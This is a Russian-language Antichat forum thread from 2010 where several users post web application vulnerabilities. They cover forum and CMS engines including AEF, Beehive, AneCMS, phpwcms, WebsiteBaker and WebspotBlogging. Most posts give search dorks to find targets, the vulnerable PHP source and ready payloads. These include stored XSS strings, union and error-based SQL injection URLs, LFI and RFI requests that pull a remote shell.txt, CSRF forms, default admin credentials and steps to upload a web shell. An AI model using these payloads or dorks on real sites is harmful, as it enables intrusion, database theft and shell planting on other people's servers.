Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.04.2010, 13:42
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Продукт:: AEF (форумный движок)
Сайт:: http://www.anelectron.com
Дорк:: "Powered by AEF" (250 000 результатов)
Уязвимость:: Активная XSS.
Уязвимость присутствует из-за небезопасной обработки BB-тегов.
Можно вызвать разрушение тегов, и, как следствие, выполнение javascript-кода.
Пример эксплуатации:
Код:
[*url]http://asd.asd[*email]asd@asd.asd onmouseover=alert() bla=[*/email][*/url]
На выходе получаем:
Код:
<a href="http://asd.asd<a href="mailto:asd@asd.asd onmouseover=alert() bla=" target="_blank">asd@asd.asd onmouseover=alert() bla=</a>" target="_blank">http://asd.asd<a href="mailto:asd@asd.asd onmouseover=alert() bla=" target="_blank">asd@asd.asd onmouseover=alert() bla=</a></a>
Можно также провести атаку через стили (для ie и ff), тогда можно спрятать куски разрушенного тега:
Код:
[*url]http://asd.asd[*email]asd@asd.asd style=display:none;olo:expression(alert());-moz-binding:url() bla=[*/email][*/url]
Последний раз редактировалось Root-access; 08.04.2010 в 13:47..
|
|
|
08.04.2010, 14:28
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Продукт:: Beehive (форумный движок)
Сайт:: http://beehiveforum.sourceforge.net/
Дорк:: "Project Beehive Forum" (?)
Уязвимость:: Активная XSS.
Уязвимость существует из-за недостаточной фильтрации слова javascript в сообщении.
Строчка из /include/fixhtml.php (скрипт "безопасной" обработки html):
PHP код:
$attrib_value = preg_replace("/javascript:/ixu", '', $attrib_value);
В движке разрешён html, а это ограничение обходится простым кодированием html (протокол от этого валидность не теряет):
Код:
<img src="javascript:alert()" />
|
|
|
|
08.04.2010, 15:16
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Продукт:: CompactCMS
Сайт:: http://www.compactcms.nl
Дорк:: "Maintained with CompactCMS"
//тут была глупая ошибка, Strilo4ka заметил...
Уязвимость:: Исполнение произвольного кода.
Требования: права админа (админка по умолчанию не запаролена - /admin)
Жмём Create a new page, создаём страничку с php-кодом, затем она инклудится, и мы имеем шелл.
Последний раз редактировалось Root-access; 09.04.2010 в 11:50..
|
|
|
|
08.04.2010, 23:01
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
AneCMS
Product : Demo AneCMS v1
Blind SQL injection
Код:
http://demo.anecms.com/blog/delete/1/1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/
Active XSS
comments blog news - "><script>alert();</script>
Код:
http://anecms.com/blog/5/Template_Engine_and_cleaning_time
LFI
rss.php
PHP код:
if(isset($_GET['module']))
include './modules/'.$_GET['module'].'/rss.php';
Код:
http://x60unu/rss.php?module=../[file]%00
Admin panel
PHP код:
include './pages/'.$_GET['p'].'.php';
Код:
http://demo.anecms.com/acp/?p=lfi
Код:
http://x60unu/acp/index.php?p=../../[file]%00
Путь
Код:
http://demo.anecms.com/register/next
Дыр тут много 
Последний раз редактировалось [x60]unu; 08.04.2010 в 23:19..
|
|
|
|
09.04.2010, 07:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
phpwcms v1.4.5
release 2010
Скачано отсюдо!
XSS + HPP
/image_zoom.php
Код:
..if(empty($_GET["show"])) {
$width_height = '';
$img = "img/leer.gif";
} else {
$img = base64_decode($_GET["show"]);
list($img, $width_height) = explode('?', $img);
$img = str_replace(array('http://', 'https://', 'ftp://'), '', $img);
$img = strip_tags($img);
$width_height = strip_tags($width_height);
$img = PHPWCMS_IMAGES.urlencode($img);...
Код:
...<a href="#" title="Close PopUp" onclick="window.close();return false;"><img src="<?php echo $img ?>" alt="" border="0" <?php echo $width_height ?> /></a>...
Result:
1) формируем код, example: адрес_рисунка?onmouseover=alert(1)
2) переводим в base64 - MDRANUFfQDhBQz06MD9vbm1vdXNlb3Zlcj1hbGVydCgxKQ==
3) тулим эту строку гетом в show.
ps админка - /login.php
По умолчанию:
логин - admin;
пасс - phpwcms (md5).
Последний раз редактировалось Strilo4ka; 15.04.2010 в 06:01..
|
|
|
|
10.04.2010, 22:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
AneCMS
Продолжение поста [x60]unu.
RFI
ajax.php!
PHP код:
<?php
include './system/pages/essential.php';
if(isset($_POST['p']))
include $_POST['p'];
?>
Условие:
allow_url_include = On
Експлуатация:
Код HTML:
<form method="POST" action="http://localhost/anecms/ajax.php">
<input type="text" name="p" />
<input type="submit" /></form>
Последний раз редактировалось Strilo4ka; 15.04.2010 в 06:00..
|
|
|
|
11.04.2010, 12:38
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
WebsiteBaker 2.8.1
WebsiteBaker 2.8.1
Sql-injection(требования register_globals=on)
PHP код:
if(isset($_GET['page_id']) AND is_numeric($_GET['page_id'])) {
$page_id = $_GET['page_id'];
} else {
header('Location: /');
exit(0);
}
if(isset($_GET['group_id']) AND is_numeric($_GET['group_id'])) {
$group_id = $_GET['group_id'];
define('GROUP_ID', $group_id);
}
/*--*/
if(isset($group_id)) {
$query = "SELECT * FROM ".TABLE_PREFIX."mod_news_posts WHERE group_id=".$group_id." AND page_id = ".$page_id." AND active=1 AND ".$time_check_str." ORDER BY posted_when DESC";
} else {
эксплуатация:
/modules/news/rss.php?page_id=2&group_id=1+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,14,15--+
Способов залиться несколько:
1)В админке аплоадим зип архив с шеллом, распаковываем средствами админ-панели.
2)аплоадим какой-нибудь shell.php.xs(если apache в качестве вебсервера)
|
|
|
|
11.04.2010, 14:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Rat CMS
SQL ing
login.php
PHP код:
...$userId = $_POST['txtUserId'];
$password = $_POST['txtPassword'];
// check if the user id and password combination exist in database
$sql = "SELECT user_id
FROM tbl_auth_user
WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
$result = mysql_query($sql) or die('Query failed. ' . mysql_error());
if (mysql_num_rows($result) == 1) {
// the user id and password match,
// set the session
$_SESSION['db_is_logged_in'] = true;
// after login we move to the main page
header('Location: main.php');
exit;
} else {
$errorMessage = 'Sorry, wrong user id / password';
}...
Result :
в поле txtUserId - ' union select 1--[ ]
Условие:
mg=off
Далее привожу только код других файлов:
viewarticle.php , viewarticle2.php
PHP код:
...else {
// get the article info from database
$query = "SELECT title, content FROM news WHERE id=".$_GET['id'];
$result = mysql_query($query) or die('Error : ' . mysql_error());
$row = mysql_fetch_array($result, MYSQL_ASSOC); ...
Последний раз редактировалось Strilo4ka; 15.04.2010 в 06:00..
|
|
|
|
12.04.2010, 11:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
123
basic cms
CSRF + SQL inj(в админке!)
просто выношу потому что редкий интересный случай1
Admin/Pages/List.php
PHP код:
...
$strAction=QuerySafeString($_POST["txtAction"]);
}
if ($_SESSION["Admin"] =="Y")
{
$conclass =new DataBase();
if ($strAction=="DEL")
{
if (isset($_POST['chkSelect']))
{
$strSelection=$_POST['chkSelect'];
$strSQL="DELETE FROM pages_t_details WHERE id IN(". join(',', $strSelection) . ")";
//print $strSQL;
$strErrorMessages="";
$var1=$conclass->Execute ($strSQL,$strErrorMessages);
}...
Includes/Database.php
PHP код:
...
function QuerySafeString($pstrString)
{
$badChars = array("\'");
$newChars = array("'");
$pstrString = str_replace($badChars, $newChars, $pstrString);
$pstrString=killChars($pstrString);
return $pstrString;
}...
Includes/Database.php
PHP код:
...function killChars($strWords)
{
$badChars = array("select", "drop", ";", "--", "insert", "delete","Update");
$newChars = array("", "", "", "", "", "", "");
$strWords = str_replace($badChars, $newChars, $strWords);
return $strWords;
}...
Вывод ошибки от СУБД
Includes/Database.php
PHP код:
...
function Execute($strSQL,$strErrorMessages)
{
$result = mysql_query($strSQL) or die("Query failed : " . mysql_error());
return $result;
}...
Result:
<FORM action="http://localhost/basiccms/Admin/Pages/List.php?txtAction=" method="POST">
<INPUT type="checkbox" name="chkSelect[]" id="chkSelect[]" value="666" checked>
<INPUT type="checkbox" name="chkSelect[]" id="chkSelect[]" value="(Select * from (Select name_const(version(),1),name_const(version(),1))x) " checked>
<INPUT type="checkbox" name="txtAction" value="DEL" checked>
<input type=submit value="inj">
</FORM>
SQL inj
Admin/Pages/AddModifyInput.php
PHP код:
...$strsql = "SELECT id, title,description,startpage FROM pages_t_details WHERE id=" . $strID;
$rst= $conclass->Execute ($strsql,$strError);...
Result:
http://localhost/basiccms/admin/pages/AddModifyinput.php?ID=9+union+Select+1,version%28% 29,3,4
Также уязвим Admin./Pages/AddModifyDelete.php
XSRF+SQL inj(права админа!)
PHP код:
...$strsql="DELETE FROM pages_t_details ";
$strsql.= " WHERE id=" .SQLSafeString($strID);...
Result:
http://localhost/basiccms/admin/pages/AddModifyInput.php?action=DEL&ID=1+or+%281,2%29=%2 8Select%20*%20from%20%28Select%20name_const%28vers ion%28%29,1%29,name_const%28version%28%29,1%29%29x %29
ps еще можна было провести (в других файлах) XSRF на добавление пользователей, ... + SQL inj(права админа).
Последний раз редактировалось Strilo4ka; 15.04.2010 в 05:59..
|
|
|
|
12.04.2010, 13:08
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
WebspotBlogging
Product : WebspotBlogging v 3.01
RFI, LFI
файлы в главной папке обращаются к файлам из папки inc в которых можно увидеть код - пример
inc/mainheader.inc.php
PHP код:
include($path."inc/global.php");
allow_url_include = On
rg = on
result :
Код:
http://x60unu/archives.php?path=http:/site/shell.txt?
http://x60unu/register.php?path=http://site/shell.txt?
http://x60unu/index.php?path=http://site/shell.txt?
http://x60unu/showpost.php?path=http://site/shell.txt?
http://x60unu/login.php?path=http://site/shell.txt?
http://x60unu/postcomment.php?path=http://site/shell.txt?
http://x60unu/showarchive.php?path=http://site/shell.txt?
http://x60unu/rss.php?path=http://site/shell.txt?
Ну и там же LFI
SQL Injection
Для всех скуль нужно mq=off
showpost.php
PHP код:
$sql = "SELECT * FROM blog WHERE pid = '".$_GET['id']."';";
$query = mysql_query($sql);
Код:
http://x60unu/showpost.php?id=1'+and+0+union+all+select+1,2,3,4,5,6,7,8,9,10--+
showarchive.php
PHP код:
$monthdate = $_GET['monthdate'];
$sql = "SELECT * FROM blog WHERE month_date = '".$_GET['monthdate']."' ORDER BY date_time DESC;";
$query = mysql_query($sql);
Код:
http://x60unu/showarchive.php?monthdate='+and+0+union+all+select+1,2,3,4,5,6,7,8,9,10--+
зарегистрированным пользователям
posting/edit.php
PHP код:
$query = $database->query("SELECT * FROM blog WHERE pid = '".$_REQUEST['id']."'");
$post = $database->fetch_array($query);
Код:
http://x60unu/posting/edit.php?id=1'+and+0+union+all+select+1,2,3,version(),5,6,7,8,9,10--+
posting/editcomment.php
PHP код:
$query = $database->query("SELECT * FROM comments WHERE cid = '".$_GET['id']."'");
if($database->num_rows($query) < 1){
Код:
http://x60unu/posting/editcomment.php?id=1'+and+0+union+all+select+1,2,3,4,5--+
posting/comments.php
PHP код:
$query = $database->query("SELECT * FROM comments WHERE pid = '".$_REQUEST['id']."' ORDER BY date_time DESC");
if($database->num_rows($query) < 1){
Код:
http://x60unu/posting/comments.php?id=1'+and+0+union+all+select+1,2,3,4,5--+
Blind SQL Injection
mysql = 5
mq = off
postcomment.php комментируем запись -->
PHP код:
$database->query("INSERT INTO comments (cid,uid,comment,date_time,pid) VALUES ('','".$_SESSION['uid']."','".$_POST['comment']."',NOW(),'".$_POST['pid']."')");
header("Location: showpost.php?id=".$_POST['pid']);
ob_end_flush();
users/index.php редактируем email -->
register.php - регистрация -->
PHP код:
$sql = "INSERT INTO users (`uid`,`username`,`password`,`admin`,`mod`,`email`,`newsletter`) VALUES ('','".$_POST['username']."','".md5($_POST['password'])."',0,0,'".$_POST['email']."','".$_POST['newsletter']."')";
$query = $database->query($sql);
-->
Код:
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Active Xss
comments - комментируем записи "/><script>alert("xss");</script>
user cp - email "/><script>alert("xss");</script>
posting - "/><script>alert("xss");</script>
Последний раз редактировалось [x60]unu; 12.04.2010 в 22:36..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
Похожие темы
Линейный вид
